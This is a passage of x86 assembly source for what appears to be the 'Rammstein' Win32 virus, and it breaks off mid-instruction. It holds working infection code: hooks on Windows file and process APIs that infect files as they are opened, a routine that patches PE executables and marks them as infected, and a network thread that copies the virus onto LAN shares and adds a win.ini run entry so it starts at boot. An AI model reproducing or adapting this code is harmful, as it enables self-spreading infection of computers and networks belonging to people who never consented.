ax, '' ; + cmp ax, 'ZM' xor '' ; check if it is an EXE + jne error ; + mov esi, dword ptr [esi.MZ_lfanew] ; get pointer to PE + cmp esi, 1000h ; too far away? + jae error ; + add esi, ebx ; + mov ax, word ptr [esi] ; + xor ax, '' ; + cmp ax, 'EP' xor '' ; is it a PE? + jne error ; + add esi, IMAGE_FILE_HEADER_SIZE ; skip header + mov edi, dword ptr [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress] + add edi, ebx ; and get import RVA + mov ecx, dword ptr [esi.OH_DataDirectory.DE_Import.DD_Size] + add ecx, edi ; and import size + mov eax, edi ; save RVA + ; +locate_module: ; + mov edi, dword ptr [edi.ID_Name] ; get the name + add edi, ebx ; + push eax ; + mov eax, [edi] ; + xor eax, '癬' ; + cmp eax, 'NREK' xor '癬' ; and compare to KERN + pop eax ; + je found_the_import_module ; if it is not that one + add eax, IMAGE_IMPORT_DESCRIPTOR_SIZE ; skip to the next desc. + mov edi, eax ; + cmp edi, ecx ; but not beyond the size + jae error ; of the descriptor + jmp locate_module ; + ; +found_the_import_module: ; if we found the kernel + mov edi, eax ; import descriptor + mov esi, dword ptr [edi.ID_FirstThunk] ; take the pointer to + add esi, ebx ; addresses + mov edi, dword ptr [edi.ID_Characteristics] ; and the pointer to + or edi, edi ; no names? ;-( + jz error ; + add edi, ebx ; names + mov edx, functions_nr ; + ; +hooked_api_locate_loop: ; + push edi ; save pointer to names + mov edi, dword ptr [edi.TD_AddressOfData] ; go to the actual thunk + add edi, ebx ; + add edi, 2 ; and skip the hint + ; + push edi esi ; save these + xchg edi, esi ; + call StringCRC32 ; eax = crc32 + ; + push edi ecx ;search them... + lea edi, [ebp+HookedFunctions] ; + mov ecx, functions_nr ; + ; +check: ; + cmp [edi], eax ;does it match? + je found_it ; + add edi, 8 ;get next... + loop check ; + jmp not_found ; + ; +found_it: ; + mov eax, [edi+4] ;get the new address + mov [ebp+tempcounter], edi ; + add eax, ebp ;and align to imagebase + pop ecx edi ; + jmp found_one_api ; + ; +not_found: ; + pop ecx edi ; + ; + pop esi edi ; otherwise restore + ; + pop edi ; restore arrays indexes + ; +api_next: ; + add edi, 4 ; and skip to next + add esi, 4 ; + cmp dword ptr [esi], 0 ; 0? -> end of import + je error ; + jmp hooked_api_locate_loop ; + ; +found_one_api: ; + pop esi ; restore stack + pop edi ; + pop edi ; + ; + pusha ; + mov edi, [ebp+tempcounter] ; + mov ebx, [esi] ; + lea eax, [ebp+offset HookedFunctions] ; + sub edi, eax ; + mov ecx, 8 ; + xchg eax, edi ; + xor edx, edx ; + div ecx ; + imul eax, eax, proc_len ; + lea edi, [ebp+StartOfHooks] ; + add edi, eax ; + mov byte ptr [edi+5], 0E9h ; + sub ebx, edi ; + add ebx, 05h-0fh ; + mov [edi+6], ebx ; + popa ; + ; + mov [esi], eax ;save new api address!!! + dec edx ;did we find all? + jz error ; + jmp api_next ; + ENDIF ; + ; +error: ; + mov [ebp+apihookfinish], 1 ; + IF THREAD5SEH ; + jmp restore_thread5_seh ;host + ; +Thread5Exception: ;if we had an error we + mov esp, [esp+8] ;must restore the ESP + call DeltaRecover5 ; +DeltaRecover5: ; + pop ebp ; + sub ebp, offset DeltaRecover5 ; + ; +restore_thread5_seh: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + ENDIF ; + ; + push 0 ; + push 5 ; + push [ebp+hsemaphore] ; + call [ebp+_ReleaseSemaphore] ; + call [ebp+_ExitThread], 0 ; +Thread_5_StartAddress endp ; + ; +StartOfHooks label ; +Hook_CopyFileA: ;Here come the hook + call Hooker ;redirectors... + jmp [ebp+_CopyFileA] ; +Hook_CopyFileExA: ; + call Hooker ; + jmp [ebp+_CopyFileExA] ; +Hook_CreateFileA: ; + call CreateFileHooker ; + jmp [ebp+_CreateFileA] ; +Hook_GetCompressedFileSizeA: ; + call Hooker ; + jmp [ebp+_GetCompressedFileSizeA] ; +Hook_GetFileAttributesA: ; + call Hooker ; + jmp [ebp+_GetFileAttributesA] ; +Hook_GetFileAttributesExA: ; + call Hooker ; + jmp [ebp+_GetFileAttributesExA] ; +Hook_SetFileAttributesA: ; + call Hooker ; + jmp [ebp+_SetFileAttributesA] ; +Hook_GetFullPathNameA: ; + call Hooker ; + jmp [ebp+_GetFullPathNameA] ; +Hook_MoveFileA: ; + call Hooker ; + jmp [ebp+_MoveFileA] ; +Hook_MoveFileExA: ; + call Hooker ; + jmp [ebp+_MoveFileExA] ; +Hook_OpenFile: ; + call Hooker ; + jmp [ebp+_OpenFile] ; +Hook_CreateProcessA: ; + call Hooker ; + jmp [ebp+_CreateProcessA] ; +Hook_WinExec: ; + call Hooker ; + jmp [ebp+_WinExec] ; +Hook_DestroyWindow: ; + call ExitProcessHooker ; + jmp [ebp+_DestroyWindow] ; +Hook_ExitProcess: ; + call ExitProcessHooker ; + jmp [ebp+_ExitProcess] ; +proc_len = $-Hook_ExitProcess ; + ; +Hooker proc ;And this is our hook... + pushad ; + pushfd ; + ; + call @HookerDelta ; +@HookerDelta: ; + pop ebp ; + sub ebp, offset @HookerDelta ; + ; + IF VIRUSNOTIFYHOOK ; + pusha ; + push 0 ; + call hooktext1 ; + db 'Rammstein viral hook code!', 0 ; +hooktext1: ; + call hooktext2 ; + db 'Rammstein viral hook code!', 0 ; +hooktext2: ; + push 0 ; + call [ebp+_MessageBoxA] ; + popa ; + ENDIF ; + ; +good_to_infect: ; + mov esi, [esp+2ch] ; + push esi ; + call ValidateFile ;first validate the file + pop edi ; + jc no_good_file ; + ; +@003: cmp [ebp+free_routine], NOT_AVAILABLE ; + je @003 ; + mov [ebp+free_routine], NOT_AVAILABLE ; + call InfectFile ; + mov [ebp+free_routine], AVAILABLE ; + ; +no_good_file: ; + popfd ; + popa ; + ret ; +Hooker endp ; + ; +ExitProcessHooker proc ; + pusha ; + call ExitHookerEbp ; +ExitHookerEbp: ; + pop ebp ; + sub ebp, offset ExitHookerEbp ; + ; + mov [ebp+process_end], 1 ; +@fo: cmp [ebp+fileopen], TRUE ;we cannot allow shutdown + je @fo ;while our thread has a + popa ;file opened... + ret ; +ExitProcessHooker endp ; + ; +CreateFileHooker proc ; + pusha ; + pushfd ; + call CreateFileEbp ; +CreateFileEbp: ; + pop ebp ; + sub ebp, offset CreateFileEbp ; + mov eax, [esp+2ch+4+4+4+4] ; + cmp eax, OPEN_EXISTING ; + je good_to_infect ; + ; + popfd ; + popa ; + ret ; +CreateFileHooker endp ; + ; +HookedFunctions: ; +crc32 ; + dd offset Hook_CopyFileA ; +crc32 ; + dd offset Hook_CopyFileExA ; +crc32 ; + dd offset Hook_CreateFileA ; +crc32 ; + dd offset Hook_GetCompressedFileSizeA ; +crc32 ; + dd offset Hook_GetFileAttributesA ; +crc32 ; + dd offset Hook_GetFileAttributesExA ; +crc32 ; + dd offset Hook_SetFileAttributesA ; +crc32 ; + dd offset Hook_GetFullPathNameA ; +crc32 ; + dd offset Hook_MoveFileA ; +crc32 ; + dd offset Hook_MoveFileExA ; +crc32 ; + dd offset Hook_OpenFile ; +crc32 ; + dd offset Hook_CreateProcessA ; +crc32 ; + dd offset Hook_WinExec ; +crc32 ; + dd offset Hook_DestroyWindow ; +crc32 ; + dd offset Hook_ExitProcess ; +functions_nr = ($-offset HookedFunctions)/8 ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; This Thread is the Network Infector +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +Thread_6_StartAddress proc PASCAL tdelta: dword ; + call @Thread6Delta ; +@Thread6Delta: ; + pop ebp ; + sub ebp, offset @Thread6Delta ; + ; + IF NETWORKINFECTION ; + cmp [ebp+netapis], FALSE ; + je exit_netcrawl ; + ; + IF THREAD6SEH ; + lea eax, [ebp+Thread6Exception] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ENDIF ; + ; + call NetInfection C, 0 ; + jmp done_net ; + ; +NetInfection proc C lpnr:DWORD ; + ; +local lpnrLocal :DWORD ; +local hEnum :DWORD ; +local ceEntries :DWORD ; +local cbBuffer :DWORD ; + ; + pusha ; + call get_new_delta ; +get_new_delta: ; + pop edx ; + sub edx, offset get_new_delta ; + ; + mov [ceEntries], 0FFFFFFFFh ;as many entries as poss. + mov [cbBuffer], 4000 ;memory buffer size + lea eax, [hEnum] ;handle to enumeration + mov esi, [lpnr] ;parameter + call [edx+_WNetOpenEnumA], RESOURCE_CONNECTED,\ ;open the enumeration + RESOURCETYPE_ANY, 0,\ ; + esi, eax ; + ; + or eax, eax ;failed? + jnz exit_net ; + ; + call [edx+_GlobalAlloc], GPTR, cbBuffer ;allocate memory + or eax, eax ; + jz exit_net ; + mov [lpnrLocal], eax ;save memory handle + ; +enumerate: ; + lea eax, cbBuffer ;enumerate all the + push eax ;resources + mov esi, [lpnrLocal] ; + push esi ; + lea eax, ceEntries ; + push eax ; + push hEnum ; + call [edx+_WNetEnumResourceA] ; + ; + or eax, eax ;failed? + jnz free_mem ; + ; + mov ecx, [ceEntries] ;how many entries? + or ecx, ecx ; + jz enumerate ; + ; +roam_net: ; + push ecx esi ; + ; + mov eax, [esi.dwType] ;is it a disk resource? + test eax, RESOURCETYPE_DISK ; + jz get_next_entry ; + ; + mov edi, [esi.lpRemoteName] ;get remote name + mov esi, [esi.lpLocalName] ;get local name + or esi, esi ;empty? + jz no_good_name ; + ; + cmp word ptr [esi],0041 ;is it a floppy disk? + jz no_good_name ; + ; + call RemoteInfection ;try to infect it! + ; +no_good_name: ; + pop esi ; + ; + mov eax, [esi.dwUsage] ;do we have a container? + test eax, RESOURCEUSAGE_CONTAINER ; + jz get_next_entry ; + ; + push esi ; + call NetInfection ;recurse!! + ; +get_next_entry: ; + add esi, 20h ;next resource! + pop ecx ; + loop roam_net ; + ; + jmp enumerate ;and next enumeration... + ; +free_mem: ; + call [edx+_GlobalFree], [lpnrLocal] ;free the memory + ; + call [edx+_WNetCloseEnum], [hEnum] ;and close enumeration. + ; +exit_net: ; + popa ; + ret ; +NetInfection endp ; + ; +RemoteInfection proc ; + pusha ; + call @___1 ;restore the delta handle +@___1: ; + pop ebp ; + sub ebp, offset @___1 ; + ; + push 260 ;get the current file + lea eax, [ebp+myname] ;name + push eax ; + push 0 ; + call [ebp+_GetModuleFileNameA] ; + or eax, eax ; + jz cannot_roam ; + ; + lea esi, [ebp+windirs] ;point windows dir names + ; +test_paths: ; + lea ebx, [ebp+droppername] ;copy path for dropper + call [ebp+_lstrcpy], ebx, edi ; + lea ebx, [ebp+winininame] ;copy path for win.ini + call [ebp+_lstrcpy], ebx, edi ; + ; + lea ebx, [ebp+droppername] ;copy windows dir + call [ebp+_lstrcat], ebx, esi ; + lea eax, [ebp+drop] ;and dropper name + call [ebp+_lstrcat], ebx, eax ; + ; + push TRUE ;now copy ourself over + push ebx ;the LAN under the new + lea eax, [ebp+myname] ;name into the remote + push eax ;windows directory + call [ebp+_CopyFileA] ; + or eax, eax ; + jz test_next ; + ; + lea ebx, [ebp+winininame] ;copy the windows dir name + call [ebp+_lstrcat], ebx, esi ;to the win.ini path + lea eax, [ebp+winini] ; + call [ebp+_lstrcat], ebx, eax ;and it's name + ; + lea eax, [ebp+winininame] ;Now create this entry + push eax ;into the win.ini file: + lea eax, [ebp+droppername] ; + push eax ;[Windows] + lea eax, [ebp+cmd] ;run=c:\windows\ramm.exe + push eax ; + inc esi ; + push esi ; + call [ebp+_WritePrivateProfileStringA] ; + jmp cannot_roam ; + ; +test_next: ; + @endsz ;go and try the next + cmp byte ptr [esi], 0fh ;windows path! + jne test_paths ; + ; +cannot_roam: ; + popa ; + ret ; + ; +smash_dropper proc ;this procedure acts like + pusha ;this: + push 260 ;if the file ramm.exe + call ramm_name ;exists in the windows dir +r_n: db 260 dup(0) ;and there is no entry +ramm_name: ;to run it at next boot + call [ebp+_GetWindowsDirectoryA] ;in the win.ini file, then + ;it will erase the file. + lea edx, [ebp+r_n] ;if the file ramm.exe + push edx ;does not exist, but there + call [ebp+_lstrlen] ;is an entry in the win + mov edi, eax ;ini file, then it will + ;remove the entry. + lea eax, [ebp+drop] ;If both are present + push eax ;they are left alone. + lea edx, [ebp+r_n] ; + push edx ; + call [ebp+_lstrcat] ; + ; + lea eax, [ebp+W32FD] ;locate ramm.exe + push eax ; + push edx ; + call [ebp+_FindFirstFileA] ; + mov [ebp+ok], 0 ; + cmp eax, INVALID_HANDLE_VALUE ; + je no_file ; + mov [ebp+ok], 1 ; + ; +no_file: ; + lea edx, [ebp+r_n] ;save name + lea eax, [ebp+droppername] ; + push edx ; + push eax ; + call [ebp+_lstrcpy] ; + ; + mov byte ptr [edx+edi], 0 ; + lea eax, [ebp+winini] ; + push eax ; + push edx ; + call [ebp+_lstrcat] ; + ;open win.ini + push 0 ; + push 0 ; + push OPEN_EXISTING ; + push 0 ; + push 0 ; + push GENERIC_READ + GENERIC_WRITE ; + push edx ; + call [ebp+_CreateFileA] ; + inc eax ; + jz no_need ; + dec eax ; + mov [ebp+hfile], eax ; + ; + push 0 ; + push eax ; + call [ebp+_GetFileSize] ; + mov [ebp+filesize], eax ; + ; + push 0 ; + push [ebp+filesize] ; + push 0 ; + push PAGE_READWRITE ; + push 0 ; + push [ebp+hfile] ; + call [ebp+_CreateFileMappingA] ; + ; + or eax, eax ; + jz no_need_1 ; + mov [ebp+hmap], eax ; + ; + push [ebp+filesize] ; + push 0 ; + push 0 ; + push FILE_MAP_ALL_ACCESS ; + push [ebp+hmap] ; + call [ebp+_MapViewOfFile] ; + ; + or eax, eax ; + jz no_need_2 ; + mov [ebp+haddress], eax ; + ; + mov ecx, [ebp+filesize] ; + sub ecx, 8 ; + ; +src_loop: ; + cmp dword ptr [eax] , 'mmar' ;search "ramm.exe" + jne no_ramm ; + cmp dword ptr [eax+4], 'exe.' ; + je found_ramm ; + ; +no_ramm: ; + inc eax ; + loop src_loop ; + ; + lea eax, [ebp+droppername] ; + push eax ; + call [ebp+_DeleteFileA] ; + jmp kill_memo ; + ; +found_ramm: ; + cmp [ebp+ok], 0 ; + jne kill_memo ; + ; + mov edx, eax ; + add edx, 8 ; + ; +rep_for_run: ; + cmp [eax], "=nur" ;search backwards for + je finished_searching ;"run=" + dec eax ; + cmp eax, [ebp+haddress] ; + je kill_memo ; + jmp rep_for_run ; + ; +finished_searching: ; + mov edi, eax ;put blanks over it! + mov al, " " ; + mov ecx, edx ; + sub ecx, edi ; + rep stosb ; + ; +kill_memo: ; + push [ebp+haddress] ;close win.ini! + call [ebp+_UnmapViewOfFile] ; + ; +no_need_2: ; + push [ebp+hmap] ; + call [ebp+_CloseHandle] ; + ; +no_need_1: ; + push [ebp+hfile] ; + call [ebp+_CloseHandle] ; + ; +no_need: ; + popa ; + ret ; +smash_dropper endp ; + ; +windirs db "\Windows", 0 ; + db "\WinNT" , 0 ; + db "\Win" , 0 ; + db "\Win95" , 0 ; + db "\Win98" , 0 ; + db 0fh ; + ; +winini db "\Win.ini" , 0 ; +drop db "\ramm.exe", 0 ; +cmd db "run" , 0 ; + ; +myname db 260 dup(0) ; +droppername db 260 dup(0) ; +winininame db 260 dup(0) ; +RemoteInfection endp ; + ; +done_net: ; + IF THREAD6SEH ; + jmp restore_thread6_seh ;host + ; +Thread6Exception: ;if we had an error we + mov esp, [esp+8] ;must restore the ESP + call DeltaRecover6 ; +DeltaRecover6: ; + pop ebp ; + sub ebp, offset DeltaRecover6 ; + ; +restore_thread6_seh: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + ENDIF ; + ; + ENDIF ; + ; +exit_netcrawl: ; + push 0 ; + push 5 ; + push [ebp+hsemaphore] ; + call [ebp+_ReleaseSemaphore] ; + call [ebp+_ExitThread], 0 ; +Thread_6_StartAddress endp ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +OurThreads dd offset Thread_1_StartAddress ; + dd offset Thread_2_StartAddress ; + dd offset Thread_3_StartAddress ; + dd offset Thread_4_StartAddress ; + dd offset Thread_5_StartAddress ; + dd offset Thread_6_StartAddress ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +ReturnToHost: ; + jmp restore_seh ;host + ; +ExceptionExit: ;if we had an error we + IF DEBUG ; + call MessageBoxA, 0, offset err, offset err, 0 + jmp go_over ; + err db 'SEH Error!', 0 ; + go_over: ; + ELSE ; + ENDIF ; + mov esp, [esp+8] ;must restore the ESP + ; +restore_seh: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ;returning to the host... + ; + db 0BDh ;restore delta handle +delta dd 0 ; + ; + cmp [ebp+firstgen], 1 ; + je generation0_exit ; + ; + IF APIHOOK ;if api hook is on we +apicheck: ;cannot return to host + cmp [ebp+apihookfinish], 1 ;until the hooking is + jne apicheck ;done... + ENDIF ; + ; + mov eax, 12345678h ;mov eax, oledip +oldeip equ $-4 ; + add eax, 12345678h ;add eax, imagebase +adjust equ $-4 ; + mov dword ptr [ebp+savedeax], eax ; + popa ; + ; + push 12345678h ; +savedeax equ $-4 ; + ret ; + ; +generation0_exit: ; + push 0 ; + call [ebp+_ExitProcess] ; + ; +InfectFile proc ; + pusha ;save regs + mov [ebp+flag], 1 ;mark success flag + mov [ebp+filename], edi ;save filename + mov esi, edi ; + call ValidateFile ; + jc failed_infection ; + ; + call [ebp+_GetFileAttributesA], edi ;get attributes + mov [ebp+fileattributes], eax ;and save them + call [ebp+_SetFileAttributesA], edi, FILE_ATTRIBUTE_NORMAL; and set + ;them normal + call [ebp+_CreateFileA], edi, GENERIC_READ+GENERIC_WRITE, 0, 0,\ + OPEN_EXISTING, 0, 0 ;open file + cmp eax, INVALID_HANDLE_VALUE ; + je finished ; + mov [ebp+hfile], eax ; + ; + mov [ebp+fileopen], TRUE ; + ; + lea ebx, [ebp+filetime1] ;save file time + push ebx ; + add ebx, 8 ; + push ebx ; + add ebx, 8 ; + push ebx ; + call [ebp+_GetFileTime], eax ; + ; + call [ebp+_GetFileSize], [ebp+hfile], 0 ;get file size + mov [ebp+filesize], eax ; + add eax, virussize + 1000h ; + mov [ebp+additional], eax ;save additional length + ; + call [ebp+_CreateFileMappingA], [ebp+hfile], 0, PAGE_READWRITE,\ + 0, [ebp+additional], 0 + or eax, eax ;create mapping object + je close_file ; + ; + mov [ebp+hmap], eax ; + ; + call [ebp+_MapViewOfFile], [ebp+hmap], FILE_MAP_ALL_ACCESS, 0, 0,\ + [ebp+additional] ;map file! + or eax, eax ; + je close_map ; + ; + mov [ebp+haddress], eax ;save address of mapping + mov esi, eax ; + ; + mov ax, word ptr [esi] ;check exe sign + xor ax, '昊' ; + cmp ax, 'ZM' xor '昊' ; + jne close_address ; + ; + call InitCopro ;check infection mark + fild word ptr [esi.MZ_oeminfo] ;this is number a + fild word ptr [esi.MZ_oeminfo] ; + fmul ; + call RestoreCopro ; + add esp, 4 ; + ; + mov esi, [esi.MZ_lfanew] ;get pointer to pe header + cmp esi, 1000h ; + ja close_address ; + add esi, [ebp+haddress] ; + ; + call [ebp+_IsBadReadPtr], esi, 1000h ;check readability + or eax, eax ; + jnz close_address ; + ; + mov [ebp+peheader], esi ;save pe header + ; + mov ax, word ptr [esi] ;check if pe file + xor ax, '' ; + cmp ax, 'EP' xor '' ; + jne close_address ; + ; + test word ptr [esi.Characteristics], IMAGE_FILE_DLL; be sure it's not + jnz close_address ;a library + ; + lea edi, [ebp+pedata] ; + xor eax, eax ; + mov ax, [esi.NumberOfSections] ;save number of sections + stosd ; + mov ax, [esi.SizeOfOptionalHeader] ;save optional header + stosd ; + add esi, IMAGE_FILE_HEADER_SIZE ;get to the optional head. + mov [ebp+optionalheader], esi ; + ; + cmp word ptr [esi.OH_MajorImageVersion], 0 ; + je skip_check ; + cmp word ptr [esi.OH_MinorImageVersion], 0 ; + je skip_check ; + call InitCopro ; + fild word ptr [esi.OH_MajorImageVersion] ;this is number b + fild word ptr [esi.OH_MajorImageVersion] ; + fmul ; + fild word ptr [esi.OH_MinorImageVersion] ;this is number c + fild word ptr [esi.OH_MinorImageVersion] ; + fmul ; + fadd ; + fsub ;here is b^2+c^2-a^2 + fldz ;is it 0? + fcompp ;compare them + fstsw ax ;get status word + call RestoreCopro ; + add esp, 4 ; + sahf ;load flags with it + jz close_address ;is it already infected? + ; +skip_check: ; + cmp [esi.OH_Subsystem], IMAGE_SUBSYSTEM_NATIVE; check if it is not + je close_address ;a driver... + ; + mov eax, [esi.OH_AddressOfEntryPoint] ;save entry eip + stosd ; + mov eax, [esi.OH_ImageBase] ;imagebase + stosd ; + mov eax, [esi.OH_SectionAlignment] ;section align + stosd ; + mov eax, [esi.OH_FileAlignment] ;file align + stosd ; + mov eax, [esi.OH_SizeOfImage] ;size of image + stosd ; + mov eax, [esi.OH_SizeOfHeaders] ;headers size + stosd ; + mov eax, [esi.OH_CheckSum] ;and checksum + stosd ; + mov eax, [esi.OH_NumberOfRvaAndSizes] ;save number of dirs.. + stosd ; + mov eax, [esi.OH_BaseOfCode] ;and base of code + stosd ; + ; + add esi, [ebp+sizeofoptionalheader] ;mov to first sec header + mov ecx, [ebp+numberofsections] ; + ; +scan_for_code: ; + mov eax, [esi.SH_VirtualAddress] ;get the RVA + cmp eax, [ebp+baseofcode] ;is it the code section? + jae found_code_section ; + add esi, IMAGE_SIZEOF_SECTION_HEADER ;no... get next... + loop scan_for_code ; + jmp close_address ; + ; +found_code_section: ; + mov [ebp+codesectionheader], esi ;save code section ptr + mov [ebp+codesectionrva], eax ; + mov ebx, [esi.SH_PointerToRawData] ; + mov [ebp+codesectionraw], ebx ; + mov ebx, [esi.SH_VirtualSize] ; + mov eax, [esi.SH_SizeOfRawData] ; + call choose_smaller ; + mov [ebp+codesectionsize], ebx ; + ; + ; + IF APIHOOK ; + pusha ; + mov esi, [ebp+optionalheader] ; + mov ecx, [ebp+numberofsections] ; + mov ebx, [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress] + or ebx, ebx ; + jz over_import ; + add esi, [ebp+sizeofoptionalheader] ; + ; +scan_for_imports: ; + mov eax, [esi.SH_VirtualAddress] ;get the RVA + cmp eax, ebx ;is it the import section? + je found_import ; + jb maybe_found ; + jmp search_next_import ; + ; +maybe_found: ; + add eax, [esi.SH_VirtualSize] ; + cmp eax, ebx ; + ja found_import ; + ; +search_next_import: ; + add esi, IMAGE_SIZEOF_SECTION_HEADER ;no... get next... + loop scan_for_imports ; + jmp no_import_found ; + ; +found_import: ;enable write on the + or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE; imports, credits to + mov [ebp+no_imports], TRUE ;Bumblebee for this. + jmp over_import ; + ; +no_import_found: ; + mov [ebp+no_imports], FALSE ; + ; +over_import: ; + popa ; + ENDIF ; + call locate_last_section_stuff ;locate stuff in the last + ;section + call add_new_section ;add a new section + jnc ok_go_with_it ; + ; + call increase_last_section ; + mov edi, [ebp+finaldestination] ; + jmp do_virus_movement ; + ; +ok_go_with_it: ; + mov eax, [esi.SH_SizeOfRawData] ;get the 2 sizes and be + cmp eax, virussize ;sure we are smaller then + jb set_method_1 ;both of them... + mov eax, [esi.SH_VirtualSize] ; + cmp eax, virussize ; + jb set_method_1 ; + ; +size_is_ok: ; + cmp eax, virussize ;do we fit into the code + jb set_method_1 ;section? + ; + mov [ebp+method], METHOD_MOVE_CODE ;if yes, move the code... + ; + mov ecx, 5 ; + ; +establish_home: ; + mov esi, [ebp+codesectionheader] ; + mov eax, [esi.SH_SizeOfRawData] ; + mov ebx, [esi.SH_VirtualSize] ; + call choose_smaller ; + mov ebx, [esi.SH_PointerToRawData] ;get pointer to data + mov [ebp+codesectionraw], ebx ;save it... + mov esi, ebx ;get a delta difference + IF RANDOMIZE_ENTRY ; + sub eax, virussize ;to place us in and + dec eax ;randomize it... + call brandom32 ; + ELSE ; ; + mov eax, 1 ; + ENDIF ; + mov [ebp+codedelta], eax ;from where we start? + ; + call check_intersection ;are we intersecting with + jnc continue_process ;other directories? + loop establish_home ;if yes, try again! + ; + jmp set_method_1 ;if cannot find place move + ;at end! + ; +continue_process: ; + add esi, eax ; + add esi, [ebp+haddress] ; + push esi ; + mov edi, [ebp+last_section_destination] ;save our destination... + add edi, [ebp+haddress] ; + call [ebp+_IsBadWritePtr], edi, virussize ;can we write? + or eax, eax ; + jnz close_address ; + call move_virus_size ;move the original code + pop edi ;from here... + mov [ebp+finaldestination], edi ;save the destination of + ;code +do_virus_movement: ; + cmp [ebp+method], METHOD_INCREASE_LAST ; + jne not_increase_last ; + mov eax, [ebp+last_section_destination] ; + sub eax, [ebp+lastsectionraw] ; + add eax, [ebp+lastsectionrva] ; + jmp set_it ; + ; +not_increase_last: ; + cmp [ebp+method], METHOD_APPEND_AT_END ; + jne not_at_end ; + mov eax, [ebp+lastsectionrva] ; + jmp set_it ; + ; +not_at_end: ; + mov eax, [ebp+codesectionrva] ; + add eax, [ebp+codedelta] ; + ; +set_it: ; + add eax, (ourpoint-start)-1 ; + mov dword ptr [ebp+ourpoint+1], eax ;for imagebase getter + ; + mov eax, [ebp+last_section_destination] ;here is a raw ptr in the + sub eax, [ebp+lastsectionraw] ;last section. Substract + add eax, [ebp+lastsectionrva] ;raw pointer and add virt + mov dword ptr [ebp+codesource], eax ;pointer to get a RVA + mov eax, [ebp+finaldestination] ;same crap on destination + sub eax, [ebp+haddress] ; + sub eax, [ebp+codesectionraw] ; + add eax, [ebp+codesectionrva] ; + mov dword ptr [ebp+codedestin], eax ; + ; + mov [ebp+copying], 1 ;syncronization + mov ecx, 100d ; + loop $ ; + ; + lea esi, [ebp+start] ;move virus now in the + call move_virus_size ;code place... + mov [ebp+copying], 0 ; + ; + mov eax, [ebp+addressofentrypoint] ;save old eip + mov edi, [ebp+finaldestination] ; + mov [edi+offset oldeip-offset start], eax ; + ; + mov esi, [ebp+codesectionheader] ; + or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ + jmp continue ;make code writable + ; +set_method_1: ; + mov [ebp+method], METHOD_APPEND_AT_END ;here we append the virus + ;at the end... + mov edi, [ebp+last_section_destination] ; + add edi, [ebp+haddress] ; + mov [ebp+finaldestination], edi ; + call [ebp+_IsBadWritePtr], edi, virussize ;can we write? + or eax, eax ; + jnz close_address ; + jmp do_virus_movement ; + ; +continue: ; + call check_not ;check lists + mov eax, [ebp+finaldestination] ; + add eax, (offset firstgen-offset start) ;zero the first gen mark + mov dword ptr [eax], 0 ; + ; + mov esi, [ebp+optionalheader] ;now align size of image + mov eax, [ebp+sizeofimage] ;to the section alignment + add eax, [ebp+newsize] ; + cmp eax, [ebp+totalsizes] ; + jb sizeofimage_ok ; + ; + call align_to_sectionalign ; + mov [esi.OH_SizeOfImage], eax ; + ; +sizeofimage_ok: ; + mov eax, [ebp+filesize] ;align the filesize to + add eax, [ebp+newsize] ;the file alignment + call align_to_filealign ; + mov [ebp+filesize], eax ; + ; + cmp [ebp+method], METHOD_APPEND_AT_END ; + je alternate ; + cmp [ebp+method], METHOD_INCREASE_LAST ; + je alternate2 ; + mov eax, [ebp+finaldestination] ;get our final destination + sub eax, [ebp+haddress] ;substract current map + sub eax, [ebp+codesectionraw] ; + add eax, [ebp+codesectionrva] ; + jmp set_eip ; + ; +alternate2: ; + pusha ; + mov esi, [ebp+lastsectionheader] ; + mov eax, [esi.SH_VirtualSize] ; + xchg eax, [esi.SH_SizeOfRawData] ; + mov [esi.SH_VirtualSize], eax ; + popa ; + ; + mov eax, [ebp+last_section_destination] ; + sub eax, [ebp+lastsectionraw] ; + add eax, [ebp+lastsectionrva] ; + call EPO_Routine ; + jnc set_epo ; + jmp set_eip ; + ; +alternate: ; + mov eax, [ebp+lastsectionrva] ; + call EPO_Routine ; + jnc set_epo ; + jmp set_eip ; + ; +set_epo: ; + pusha ; + mov ebx, [ebp+addressofentrypoint] ; + mov edx, ebx ; + add ebx, [ebp+codesectionraw] ; + sub ebx, [ebp+codesectionrva] ; + add ebx, [ebp+haddress] ; + sub eax, edx ; + sub eax, 5 ; + mov edx, dword ptr [ebx] ; + mov ecx, dword ptr [ebx+4] ; + mov byte ptr [ebx], 0e9h ; + mov dword ptr [ebx+1], eax ; + mov eax, [ebp+finaldestination] ; + add eax, (offset saved_code-offset start) ; + mov [eax], edx ; + mov [eax+4], ecx ; + popa ; + jmp mark_infection ; + ; +set_eip: ; + mov [esi.OH_AddressOfEntryPoint], eax ;address and save eip RVA + ; +mark_infection: ; + mov eax, 100d ;get random pythagora's + call brandom32 ;numbers roots + mov word ptr [ebp+m], ax ;m + mov eax, 100d ; + call brandom32 ; + mov word ptr [ebp+n], ax ;n + ; + call InitCopro ; + fild word ptr [ebp+n] ;load the root numbers + fild word ptr [ebp+m] ; + fild word ptr [ebp+n] ; + fild word ptr [ebp+m] ; + fmul st, st(2) ;M*M + fincstp ; + fmul st, st(2) ;N*N + fdecstp ; + fadd st, st(1) ;M*M + N*N + fist word ptr [ebp+a] ;store it to a + fsub st, st(1) ; + fsub st, st(1) ; + fabs ;|M*M - N*N| + fist word ptr [ebp+c] ;store it to c + fincstp ; + fincstp ; + fmul ; + fimul word ptr [ebp+two] ;2*M*N + fist word ptr [ebp+b] ;store it to b + call RestoreCopro ;Now a^2 = b^2 + c^2 + add esp, 4 ; + ; + push esi ;mark infection! + mov esi, [ebp+haddress] ; + mov ax, [ebp+a] ; + mov word ptr 